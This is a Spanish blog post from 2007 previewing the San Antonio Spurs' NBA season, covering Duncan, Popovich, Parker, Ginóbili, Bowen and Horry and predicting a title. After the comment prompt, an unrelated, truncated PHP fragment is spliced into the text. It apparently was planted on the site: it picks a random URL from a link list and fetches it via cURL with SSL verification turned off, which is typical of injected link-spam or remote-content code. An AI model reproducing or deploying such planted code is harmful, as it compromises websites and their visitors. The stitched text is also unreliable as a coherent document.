San Antonio Spurs: la última dinastía

23 de October de 2007 por Jabho

Mediada la temporada pasada nos asombrábamos con el récord de Dallas y nos enamoraba el juego de Phoenix. ¿Aspirantes al título? Estos dos eran, sin duda, los primeros que venían a la cabeza. Pero de reojo la mirada se iba a San Antonio. Engrasaron la máquina y llegaron en plena forma a los Playoffs. Sólo Phoenix, en una serie con algo de polémica, supuso un escollo. El resto fue fácil. Cuarto anillo en 9 años que justifican que estemos hablando de la última dinastía, hasta ahora, en la NBA.

Mas allá de equipos que consiguen ganar algún título, cada cierto tiempo aparece un equipo, y un jugador, que dominan la liga. Dominan la liga, ganan títulos y se quedan en el recuerdo de los aficionados. En ese rincón de la memoria guardamos desde los Celtics de Russell hasta los Bulls de Jordan pasando por los Lakers del Showtime, sin olvidar a los Celtics de Bird o a los Lakers del dúo Shaq & Kobe. Y, ahora, a los Spurs de Duncan.

Porque hablar de los Spurs y su dominio es hablar de Duncan. Por si los cuatro anillos no hablan por sí mismos, sólo hace falta echar un vistazo a la carrera de Tim Duncan para darnos cuenta de que el adjetivo de All-Star se le queda corto: 2 veces MVP de la liga, 3 MVP de las finales, rookie del año, 9 de sus 10 temporadas incluido en el mejor quinteto (la restante, en el segundo mejor), 6 veces en el mejor quinteto defensivo y otras 2 en el segundo, 9 participaciones en el All-Star… Tiene 31 años, tiempo y oportunidades para que este historial, ya de leyenda, siga creciendo. Con el tiempo llegará, seguro, su inclusión en el Hall of Fame y en la siguiente lista de los mejores de la historia.

Arranca la liga 07-08 con los Spurs apoyados en el jugador que ha dominado la última década pero que no está solo. A su lado un equipo profundo, equilibrado, fuerte en defensa, con alternativas en ataque, bien dirigido desde el banquillo y, sobre todo, seguro de sí mismo. Porque cuando llega el momento de jugar a todo o nada, los Spurs son ante todo un equipo que confía en sí mismo y que, con la seguridad de los títulos logrados, no comete errores. Para ganarles hay que sufrir, sudar y hacerlo muy, muy bien.

 

Desde el banco les dirige Gregg Popovich. Su graduación en las Fuerzas Armadas puede explicar su fama de entrenador duro. Asienta el equipo desde la defensa, apartado donde es uno de los mejores de la liga, pero no descuida el ataque (98,5 puntos de media por partido la liga pasada). Durante años compatibilizó el cargo de entrenador con el de GM y entre sus méritos están elegir a Tony Parker en el pick 28 y a Ginóbili en el pick 57. Popovich dirige una plantilla echa a su medida y donde además de sus estrellas, Duncan, Parker y Ginobili, destaca un grupo de secundarios de lujo, algunos muy especializados.

Parker y Ginóbili forman el backcourt titular del equipo. Parker puede no ser un director de juego al estilo Nash o Kidd, pero es uno de los mejores bases de la liga. Su participación el los dos últimos All-Star y su MVP de las últimas finales dan fe de ello. Es un gran penetrador, decente tirador y muy listo. Lleva, por derecho propio, los galones de segundo de abordo en el equipo. Manu es un jugador intenso, buen defensor, buen tirador, corre bien la pista… En definitiva, un jugador muy completo que a veces empieza desde el banco para aportar anotación cuando los jefes descansan. Finley, antigua estrella reconvertido a buen suplente en busca de títulos, y Barry, gran tirador, les dan descanso aportando veteranía y saber estar en la cancha. Vaughn y Udrih completan la rotación.

Bruce Bowen empieza de alero titular. Es uno de los mejores defensores de perímetro de la liga aunque en demasiadas ocasiones traspasa el límite de lo que es jugar duro para jugar sucio, sin importarle poner en peligro la integridad física del rival. Odiado y despreciado por rivales y aficionados es, sin embargo, un jugador vital en este equipo. Lleva 6 años en San Antonio y siempre ha sido titular. Esto son 469 partidos, a más de 78 por temporada, como titular y con una media que supera los 30 minutos por partido. Además de buen defensor, con 7 elecciones en uno de los 2 mejores quintetos defensivos de la liga, es un buen jugador de equipo que presenta un muy buen porcentaje de tiro de 3 puntos. A sus 36 años es previsible que vaya disminuyendo su aportación y por ello los Spurs han contratado este verano a Ime Udoka, jugador de perfil muy similar, aunque esperemos que no tan sucio.

El juego interior, como el equipo, se asienta sobre Tim Duncan. Es el jugador franquicia y líder de este equipo. Es un excelente defensor y reboteador, bueno en la intimidación y en el pase, con gran movimiento de pies, buen tiro a 4 ó 5 metros, mucha inteligencia para jugar a baloncesto y ganador nato. Le acompañan por dentro Oberto, Elson y Horry. Oberto y Elson aportan el músculo y la defensa; Horry, la sonrisa. A sus 37 años y con 7 anillos en los dedos, Horry será un jugador pasable en la regular. Con la llegada de los Playoffs se transformará en un gran jugador. Y si llegan los finales apretados, en los momentos decisivos será un killer. Él es así, se jugará la última bola con la sonrisa en la boca y la seguridad de que está ahí para eso.

Así que los Spurs arrancan la liga 07-08 defendiendo el título conseguido el año pasado. Un año más entrarán en todas las quinielas y, pase lo que pase en la regular, serán el equipo a batir en la hora de verdad. Porque son un equipazo, porque son los vigentes campeones y porque tienen a Duncan.

Quinteto inicial: Parker, Ginóbili, Bowen, Oberto y Duncan.

Sexto hombre: Finley/Horry

Predicción: Campeones.

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>